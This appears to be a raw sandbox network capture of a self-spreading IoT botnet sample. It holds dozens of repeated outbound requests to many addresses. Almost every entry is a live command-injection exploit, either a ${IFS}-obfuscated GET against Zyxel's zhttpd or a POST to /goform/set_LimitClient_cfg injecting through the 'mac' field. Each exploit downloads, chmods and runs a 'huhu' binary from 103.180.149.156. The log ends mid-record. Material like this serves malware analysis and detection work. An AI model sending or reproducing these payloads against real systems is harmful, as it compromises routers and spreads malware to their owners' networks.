                                                        Feb 2, 2024 06:21:18.096642017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6527192.168.2.1446864124.245.122.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096681118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6528192.168.2.1439518148.205.173.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096719027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6529192.168.2.1443664181.40.7.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096756935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6530192.168.2.143630044.51.68.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096781969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6531192.168.2.143622671.237.22.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096803904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6532192.168.2.143681435.130.33.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096844912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6533192.168.2.1451850133.253.254.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096872091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6534192.168.2.144823034.137.64.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096909046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6535192.168.2.1460902137.0.246.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096951008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6536192.168.2.145252635.80.218.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.096965075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6537192.168.2.1433110221.215.116.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097009897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6538192.168.2.1454898195.120.51.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097052097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6539192.168.2.144504045.95.64.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097090960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6540192.168.2.1458904132.103.118.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097141981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6541192.168.2.144960264.120.109.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097181082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6542192.168.2.143607636.247.40.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097183943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6543192.168.2.1448224195.176.235.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097235918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6544192.168.2.1456518162.71.18.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097275972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6545192.168.2.144097823.33.205.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097297907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6546192.168.2.1446924191.200.211.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097358942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6547192.168.2.1447564174.37.6.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097398996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6548192.168.2.144362848.33.66.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097435951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6549192.168.2.144475489.147.207.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097460985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6550192.168.2.145534861.47.25.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097484112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6551192.168.2.1436452195.76.107.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097527981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6552192.168.2.1451994149.85.86.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097562075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6553192.168.2.144151819.219.3.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097614050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6554192.168.2.1448666156.69.203.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097647905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6555192.168.2.145603688.64.248.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097664118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6556192.168.2.1439940150.14.178.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097713947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6557192.168.2.1457968162.200.208.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097755909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6558192.168.2.1441848174.229.145.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097809076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6559192.168.2.1452292149.235.62.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097851992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6560192.168.2.1444900219.205.173.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097912073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6561192.168.2.1456572104.137.26.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097919941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6562192.168.2.1443076128.57.36.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.097970009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6563192.168.2.14329942.3.226.1848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.436410904 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:18.658864021 CET456INHTTP/1.1 404 Not Found
                                                        Date: Fri, 02 Feb 2024 06:21:17 GMT
                                                        Server: webserver
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Length: 202
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /goform/set_LimitClient_cfg</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6564192.168.2.144203045.114.145.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:18.593086004 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:18.980590105 CET39INHTTP/1.1 200 Data follows


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6565192.168.2.1452226201.65.215.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109678984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6566192.168.2.1433016186.131.239.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109711885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6567192.168.2.1458814167.104.172.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109764099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6568192.168.2.1452872217.1.164.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109796047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6569192.168.2.1451154162.203.199.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109837055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6570192.168.2.1447968101.11.130.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109894037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6571192.168.2.145076435.32.248.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109901905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6572192.168.2.145381841.81.116.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109951019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6573192.168.2.1436092145.206.14.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.109993935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6574192.168.2.14428788.97.227.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110025883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6575192.168.2.1451372184.63.126.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110055923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6576192.168.2.1456662114.1.31.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110106945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6577192.168.2.1455618121.232.99.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110178947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6578192.168.2.144065247.208.186.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110208035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6579192.168.2.1458948175.12.51.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110243082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6580192.168.2.1435020195.167.220.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110358000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6581192.168.2.145803231.32.81.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:19.110387087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6582192.168.2.14607985.171.241.56443
                                                        TimestampBytes transferredDirectionData
